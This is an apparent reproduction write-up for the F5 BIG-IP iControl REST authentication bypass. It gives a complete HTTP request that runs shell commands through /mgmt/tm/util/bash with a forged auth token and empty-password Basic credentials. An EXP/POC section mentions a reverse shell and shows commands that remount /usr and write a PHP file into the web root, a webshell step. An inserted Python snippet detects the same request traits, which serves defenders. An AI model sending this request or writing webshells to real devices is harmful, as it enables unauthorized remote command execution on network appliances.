Vulnerability Description
In F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: software versions that have reached End of Technical Support (EoTS) are not assessed.
Reproduction Process
The HTTP request is as follows:
POST /mgmt/tm/util/bash HTTP/1.1
Host: xxxxxxx
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 45
Content-Type: application/json

{
"command":"run",
"utilCmdArgs":"-c id"
}
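The following added example (not part of the original page, and not F5's own code) flags the two traits visible in the request above: a Connection header that lists an authentication header as hop-by-hop, and Basic credentials with an empty password. It assumes raw requests to the management interface are available, for example from a proxy or packet capture; the function names, the `AUTH_HEADERS` set and the sample requests are constructed for illustration.

```python
import base64

# Headers that must never be declared hop-by-hop on management requests.
# X-F5-Auth-Token comes from the request on this page; Authorization is an
# added assumption.
AUTH_HEADERS = {"x-f5-auth-token", "authorization"}

def parse_request(raw):
    """Split a raw HTTP request into (method, target, {header: [values]})."""
    head = raw.replace("\r\n", "\n").partition("\n\n")[0]
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, target, headers

def findings(raw):
    """Return a list of indicator strings for one request to /mgmt/."""
    _method, target, headers = parse_request(raw)
    if not target.lower().startswith("/mgmt/"):
        return []
    out = []
    tokens = {t.strip().lower() for v in headers.get("connection", [])
              for t in v.split(",") if t.strip()}
    listed = sorted(tokens & AUTH_HEADERS)
    if listed:
        out.append("connection-lists-auth-header:" + ",".join(listed))
    for auth in headers.get("authorization", []):
        scheme, _, cred = auth.partition(" ")
        if scheme.lower() != "basic":
            continue
        try:
            _user, sep, password = base64.b64decode(cred).decode().partition(":")
        except ValueError:  # bad base64 or non-UTF-8 credentials
            continue
        if sep and password == "":
            out.append("basic-auth-empty-password")
    return out

# Constructed samples (headers only; host names are placeholders).
SUSPICIOUS = ("POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: bigip.example\r\n"
              "Connection: keep-alive, x-F5-Auth-Token\r\n"
              "X-F5-Auth-Token: anything\r\nAuthorization: Basic YWRtaW46\r\n\r\n")
BENIGN = ("GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: bigip.example\r\n"
          "Connection: keep-alive\r\nX-F5-Auth-Token: CONSTRUCTED-TOKEN\r\n\r\n")
```

Either indicator on its own can occur in legitimate traffic, so treat the two together on a `/mgmt/` path as the high-confidence signal.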
EXP/POC
Webshell Writing
A shell was obtained via a reverse connection (reverse shell).
For writing a webshell, refer to another vulnerability, F5 BIG-IP CVE-2020-5902.
The path for writing is: /usr/local/www
mount -o remount -rw /usr
echo "<?php phpinfo();?> " > /usr/local/www/test.php
mount -o remount -r /usr
Access path:
Reference
F5 BIG-IP Remote Code Execution Vulnerability Reproduction (CVE-2020-5902)